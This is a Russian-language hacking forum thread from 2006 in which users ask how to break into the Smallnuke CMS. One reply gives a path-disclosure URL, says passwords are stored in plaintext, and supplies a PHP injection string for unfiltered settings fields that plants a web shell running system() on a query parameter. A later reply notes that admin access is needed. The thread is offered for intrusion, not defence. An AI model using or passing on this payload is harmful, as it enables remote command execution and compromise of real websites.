Взлом Smallnuke 2. Возможно ли?

Discussion in 'Болталка' started by OGNIS, 23 Feb 2006.

  1. OGNIS

    OGNIS Guest

    Reputations:
    0
    Привет!
    Кто то знает как поломать Smallnuke (www.smallnuke.com) ?
     
    #1 OGNIS, 23 Feb 2006
    1 person likes this.
  2. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    934
    Likes Received:
    394
    Reputations:
    261
    Эх я давно об этом мечтаю думаю кто-нибудь выложит уязвимости.
     
    #2 SanyaX, 23 Feb 2006
  3. zEr00nE

    zEr00nE Guest

    Reputations:
    0
    1) Раскрытие установочного пути:
    index.php?go=Search&modname=test&query=E1it3 team
    2) Возможность закачать webshell. Поля настройки никак не фильтруются, вводим в любое поле:
    ";if ($_GET['e13']) {system($_GET['e13']);exit;}$test="
    и получаем шелл по адресу
    index.php?e13=команда
    По словам автора лучше помещать в ключевые слова сайта, это конечно же разумно.
    3) Пароли пишутся в открытом виде.
     
    #3 zEr00nE, 16 Sep 2006
    1 person likes this.
  4. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    934
    Likes Received:
    394
    Reputations:
    261
    Воще бесполезная вигня. Если ты админ то только ты и сможешь замутить а так не как :(.
     
    #4 SanyaX, 16 Sep 2006
(You must log in or sign up to post here.)